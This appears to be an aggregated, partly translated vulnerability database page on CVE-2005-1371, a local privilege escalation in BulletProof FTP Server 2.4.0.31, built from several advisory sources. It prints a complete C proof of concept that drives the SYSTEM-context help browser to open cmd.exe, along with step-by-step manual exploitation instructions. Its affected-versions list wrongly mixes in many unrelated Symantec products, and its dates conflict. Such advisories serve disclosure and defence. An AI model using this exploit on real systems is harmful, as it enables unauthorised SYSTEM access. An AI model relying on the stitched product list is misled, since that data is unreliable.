CVE-2005-1371
CVSS 7.2
Published: 2005-05-03 00:00:00
Last revised: 2016-10-17 23:19:24

[Original] BPFTPServer service in BulletProof FTP Server 2.4.0.31 does not properly drop privileges before opening files through the Help menu, which allows local users to gain privileges.


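[CNNVD] BulletProof FTP Server local privilege escalation vulnerability (CNNVD-200505-884)

        The BPFTPServer service in BulletProof FTP Server 2.4.0.31 does not properly drop privileges before opening files through the Help menu, which allows local users to gain privileges.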

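- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links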

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1371
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1371
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-884
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111464474828477&w=2
(UNKNOWN)  BUGTRAQ  20050427 Privilege escalation in BulletProof FTP Server v2.4.0.31
http://www.securityfocus.com/bid/13410
(UNKNOWN)  BID  13410
http://www.vupen.com/english/advisories/2005/0419
(UNKNOWN)  VUPEN  ADV-2005-0419
http://xforce.iss.net/xforce/xfdb/20301
(UNKNOWN)  XF  bpftp-gain-privilege(20301)

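- Vulnerability information

BulletProof FTP Server local privilege escalation vulnerability
High risk, Design error
2005-05-03 00:00:00 2006-09-05 00:00:00
Local
        The BPFTPServer service in BulletProof FTP Server 2.4.0.31 does not properly drop privileges before opening files through the Help menu, which allows local users to gain privileges.

- Advisories and patches

        No data available

- Vulnerability information (971)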

BulletProof FTP Server 2.4.0.31 Local Privilege Escalation Exploit (EDBID:971)
windows local
2005-04-29 Verified
0 Jerome Athias
//******************************************************************************
//Privilege escalation in BulletProof FTP Server v2.4.0.31
//By Jerome Athias
//jerome DOT athias AT free DOT fr
//Discovered by Reed Arvin reedarvin[at]gmail[dot]com
//(http://reedarvin.thearvins.com)
//
//Little PoC
//Gives you a shell with system privileges
//******************************************************************************

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
char sText[]="%windir%\\system32\\cmd.exe";
char buffer[256];

lHandle=FindWindow(NULL, "BulletProof FTP Server v2.4.0.31");
if (!lHandle)
{
       printf("\nUsage :\nBulletProof FTP Server v2.4.0.31 doesn't seem to run?\n");
       return 0;
}
else
{
       printf("handle for BulletProof : 0x%X\n",lHandle);
}
SetForegroundWindow(lHandle);

SendMessage(lHandle, WM_IME_KEYDOWN, VK_F1, 0); //send F1 key "help me please!"
Sleep(5000);   //I need this time to drink a beer ;P

//Find the browser Handle
//lHandle2=FindWindow(NULL, "BPFTP Server - Mozilla Firefox");
//if (!lHandle2)
//{
       lHandle2=FindWindow("IEFrame", "BPFTP Server - Microsoft Internet Explorer");
       lHandle2=FindWindowEx(NULL, NULL, "IEFrame", NULL);

       printf("handle for IE : 0x%X\n",lHandle2);
       if (!lHandle2)
       {
               printf("\nError while finding the browser's window.\n");
       }
//}
//else
//{
//        printf("handle for Firefox : 0x%X\n",lHandle2);
//}
SetForegroundWindow(lHandle2);

lHandle=FindWindowEx(lHandle2, 0, "WorkerW", 0);
if (lHandle>=0)
{
       lHandle = FindWindowEx(lHandle, 0, "ReBarWindow32", 0);
       if (lHandle>=0)
       {
               //Where are you Charlie...
             lHandle = FindWindowEx(lHandle, 0, "ComboBoxEx32", 0);
             lHandle = FindWindowEx(lHandle, 0, "ComboBox", 0);
             lHandle = FindWindowEx(lHandle, 0, "Edit", 0);
       }
}
else
{
       printf("\nerror :-(\n");
}

SendMessage(lHandle, WM_SETFOCUS, 0, 0);
Sleep(300);
SendMessage(lHandle, WM_SETTEXT, 0, (LPARAM) sText);
//Shatter!
PostMessage(lHandle, WM_KEYDOWN, VK_RETURN, 0);
//whoami? :-)

return 0;
}

// milw0rm.com [2005-04-29]
		

- Vulnerability information

15898
BulletProof FTP Server System Tray Icon Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

BulletProof FTP Server contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the BPFTPServer service is installed and running as SYSTEM: a local attacker can manipulate the administrative interface and escalate privileges to those of the SYSTEM account. This flaw may lead to a loss of integrity.

- Timeline

2005-04-27 Unknown
2005-04-27 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

- Vulnerability information

BulletProof FTP Server Local Privilege Escalation Vulnerability
Design Error 13410
No Yes
2004-12-13 12:00:00 2009-07-12 02:06:00
Discovery is credited to Reed Arvin <reedarvin@gmail.com>.

- Affected program versions

Symantec Norton SystemWorks 2004
Symantec Norton SystemWorks 2003
Symantec Norton SystemWorks 2002
Symantec Norton SystemWorks 2001
Symantec Norton Internet Security 2004 Professional Edition
Symantec Norton Internet Security 2004
Symantec Norton Internet Security 2003 Professional Edition
Symantec Norton Internet Security 2003
Symantec Norton Internet Security 2002 Professional Edition 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton Internet Security 2002 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton Internet Security 2001 Professional Edition
Symantec Norton Internet Security 2001 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton AntiVirus 2004 Professional Edition
Symantec Norton AntiVirus 2004
Symantec Norton AntiVirus 2003 Professional Edition
Symantec Norton Antivirus 2003 0
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton AntiVirus 2002 Professional Edition
Symantec Norton AntiVirus 2002 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Symantec Norton AntiVirus 2001 Professional Edition
Symantec Norton AntiVirus 2001 0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98 b
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 3.5.1 SP5
- Microsoft Windows NT 3.5.1 SP3
- Microsoft Windows NT 3.5.1 SP2
- Microsoft Windows NT 3.5.1 SP1
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5
Symantec LiveUpdate 2.0
Symantec LiveUpdate 1.80.19 .0
Symantec LiveUpdate 1.9
Symantec LiveUpdate 1.8
Symantec LiveUpdate 1.7
+ Symantec Norton AntiVirus 2001 0
+ Symantec Norton AntiVirus 2002 0
+ Symantec Norton AntiVirus Corporate Edition 7.6
Symantec LiveUpdate 1.6
+ Symantec Norton AntiVirus 2001 0
+ Symantec Norton AntiVirus 2002 0
+ Symantec Norton AntiVirus Corporate Edition 7.51
+ Symantec Norton AntiVirus Corporate Edition 7.5
Symantec LiveUpdate 1.5
+ Symantec Norton AntiVirus 2001 0
Symantec LiveUpdate 1.4
+ Symantec Norton AntiVirus 5.0
Symantec AntiVirus for Handhelds Corporate Edition 3.0
Symantec AntiVirus for Handhelds 3.0
BulletProof FTP BulletProof FTP 2.4.0.31
Symantec LiveUpdate 2.5
Symantec Java LiveUpdate

- Unaffected program versions

Symantec LiveUpdate 2.5
Symantec Java LiveUpdate

- Vulnerability discussion

BulletProof FTP Server is prone to a local privilege escalation vulnerability. This issue can allow a local unprivileged attacker to gain administrative privileges on a vulnerable computer.

A local attacker may influence the BulletProof FTP Server GUI configuration functionality in a manner that grants them elevated privileges.

This issue affects BulletProof FTP Server version 2.4.0.31.

- Exploit

No exploit is required. The following steps are available:
1. Right click the BulletProof FTP Server tray icon and click Show Server.
2. Click the Help icon.
3. Internet Explorer will open (running under the context of the
LocalSystem account). Click File, Click Open.
4. Click Browse.
5. Change Files of type: to All Files, navigate to the system32
directory and locate cmd.exe. Right click cmd.exe and choose Open.

Jerome Athias has provided exploit code for this vulnerability.

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references
